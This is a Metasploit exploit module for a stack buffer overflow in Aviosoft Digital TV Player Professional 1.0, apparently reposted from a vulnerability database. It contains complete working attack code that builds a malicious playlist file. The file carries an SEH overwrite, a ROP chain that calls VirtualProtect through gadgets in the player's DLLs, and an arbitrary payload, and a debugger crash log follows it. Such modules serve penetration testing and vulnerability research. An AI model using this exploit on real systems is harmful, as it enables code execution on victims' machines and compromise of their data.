Aviosoft Digital TV Player Professional 1.0 Stack Buffer Overflow

🗓️ 12 Nov 2011 07:02:40Reported by modpr0be, sinn3r <[email protected]>Type
Aviosoft Digital TV Player Professional 1.0 Stack Buffer Overflow exploit for arbitrary code executio
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::FILEFORMAT

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Aviosoft Digital TV Player Professional 1.0 Stack Buffer Overflow",
      'Description'    => %q{
            This module exploits a vulnerability found in Aviosoft Digital TV Player
          Pro version 1.x.  An overflow occurs when the process copies the content of a
          playlist file on to the stack, which may result arbitrary code execution under
          the context of the user.
        },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'modpr0be',  #Initial discovery, poc
          'sinn3r',    #Metasploit
        ],
      'References'     =>
        [
          ['OSVDB', '77043'],
          ['EDB', '18096'],
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00\x0a\x1a",
          'StackAdjustment' => -3500,
        },
      'DefaultOptions'  =>
        {
          'EXITFUNC' => "seh",
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [
            'Aviosoft DTV Player 1.0.1.2',
            {
              'Ret'    => 0x6130534a,  #Stack pivot (ADD ESP,800; RET)
              'Offset' => 612,         #Offset to SEH
              'Max'    => 5000         #Max buffer size
            }
          ],
        ],
      'Privileged'     => false,
      'DisclosureDate' => '2011-11-09',
      'DefaultTarget'  => 0))

      register_options(
        [
          OptString.new('FILENAME', [false, 'The playlist name', 'msf.plf'])
        ])
  end

  def junk(n=1)
    return [rand_text_alpha(4).unpack("L")[0]] * n
  end

  def nops(rop=false, n=1)
    return rop ? [0x61326003] * n : [0x90909090] * n
  end

  def exploit
    rop = [
      nops(true, 10),  #ROP NOP
      0x6405347a,      #POP EDX # RETN (MediaPlayerCtrl.dll)
      0x10011108,      #ptr to &VirtualProtect
      0x64010503,      #PUSH EDX # POP EAX # POP ESI # RETN (MediaPlayerCtrl.dll)
      junk,
      0x6160949f,      #MOV ECX,DWORD PTR DS:[EDX] # POP ESI (EPG.dll)
      junk(3),
      0x61604218,      #PUSH ECX # ADD AL,5F # XOR EAX,EAX # POP ESI # RETN 0C (EPG.dll)
      junk(3),
      0x6403d1a6,      #POP EBP # RETN (MediaPlayerCtrl.dll)
      junk(3),
      0x60333560,      #& push esp #  ret 0c (Configuration.dll)
      0x61323EA8,      #POP EAX # RETN (DTVDeviceManager.dll)
      0xA13977DF,      #0x00000343-> ebx
      0x640203fc,      #ADD EAX,5EC68B64 # RETN (MediaPlayerCtrl.dll)
      0x6163d37b,      #PUSH EAX # ADD AL,5E # POP EBX # RETN (EPG.dll)
      0x61626807,      #XOR EAX,EAX # RETN (EPG.dll)
      0x640203fc,      #ADD EAX,5EC68B64 # RETN (MediaPlayerCtrl.dll)
      0x6405347a,      #POP EDX # RETN (MediaPlayerCtrl.dll)
      0xA13974DC,      #0x00000040-> edx
      0x613107fb,      #ADD EDX,EAX # MOV EAX,EDX # RETN (DTVDeviceManager.dll)
      0x60326803,      #POP ECX # RETN (Configuration.dll)
      0x60350340,      #&Writable location
      0x61329e07,      #POP EDI # RETN (DTVDeviceManager.dll)
      nops(true),      #ROP NOP
      0x60340178,      #POP EAX # RETN
      nops,            #Regular NOPs
      0x60322e02       #PUSH # RETN
    ].flatten.pack("V*")

    buf  = ''
    buf << rand_text_alpha(target['Offset']-buf.length)
    buf << [target.ret].pack('V*')
    buf << rand_text_alpha(136)
    buf << rop
    buf << make_nops(32)
    buf << payload.encoded
    buf << rand_text_alpha(target['Max']-buf.length)

    file_create(buf)
  end
end

=begin
eax=00001779 ebx=047a02c0 ecx=000001f4 edx=047a6814 esi=047a77bc edi=00130000
eip=6400f6f0 esp=0012f038 ebp=00000001 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
MediaPlayerCtrl!DllCreateObject+0x220:
6400f6f0 f3a5            rep movs dword ptr es:[edi],dword ptr [esi]
0:000> !exchain
0012f3bc: *** WARNING: Unable to verify checksum for C:\Program Files\Aviosoft\Aviosoft DTV Player Pro\DTVDeviceManager.dll
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\Aviosoft\Aviosoft DTV Player Pro\DTVDeviceManager.dll -
DTVDeviceManager+534a (6130534a)
Invalid exception stack at 41414141
0:000> !address edi
    00130000 : 00130000 - 00003000
                    Type     00040000 MEM_MAPPED
                    Protect  00000002 PAGE_READONLY
                    State    00001000 MEM_COMMIT
                    Usage    RegionUsageIsVAD
0:000> !address esi
    047a0000 : 047a0000 - 0000b000
                    Type     00020000 MEM_PRIVATE
                    Protect  00000004 PAGE_READWRITE
                    State    00001000 MEM_COMMIT
                    Usage    RegionUsageHeap
                    Handle   013c0000
=end
02 Oct 2020 20:00Current
7.9High risk
Vulners AI Score7.9